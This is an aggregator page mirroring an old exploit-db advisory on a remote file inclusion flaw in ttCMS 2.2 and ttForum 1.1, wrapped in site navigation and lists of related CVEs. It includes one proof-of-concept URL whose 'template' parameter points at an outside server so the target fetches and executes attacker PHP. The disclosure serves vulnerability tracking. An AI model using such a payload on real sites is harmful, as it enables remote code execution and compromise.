Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbCharles ReinoldEDB-ID:22577
HistoryMay 09, 2003 - 12:00 a.m.

ttCMS 2.2 / ttForum 1.1 - 'news.php?template' Remote File Inclusion

2003-05-0900:00:00
Charles Reinold
www.exploit-db.com
15

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/7542/info

A remote file include vulnerability has been reported for both ttForum and ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'News.php' and 'Install.php' scripts, it is possible for a remote attacker to include a malicious PHP file in a URL.

Successful exploitation will result in the execution of the attacker-supplied PHP instructions with the privileges of the web server.

There are conflicting reports about whether or not this issue exists. The vendor has stated that exploitation of this issue is not possible.


http://www.example.com/ttforum/index.php?action=news;board=1;
template=http://www.yourserver.com/modules/forum/helpadmin;ext=help

Related

cvelist 1
cve 1
exploitdb 1
nvd 1
nessus 2
cvelist
cvelist
CVE-2003-1459
2007-10-23 01:00:00
cve
cve
CVE-2003-1459
2007-10-23 01:00:00
exploitdb
exploitdb
ttCMS 2.2 / ttForum 1.1 - 'install.php?installdir' Remote File Inclusion
2003-05-09 00:00:00
nvd
nvd
CVE-2003-1459
2003-12-31 05:00:00
nessus
nessus
ttforum Multiple Vulnerabilities
2003-05-10 00:00:00
ttCMS 2.2 Multiple Vulnerabilities
2003-05-19 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:22577
cvelist1cve1exploitdb1nvd1nessus2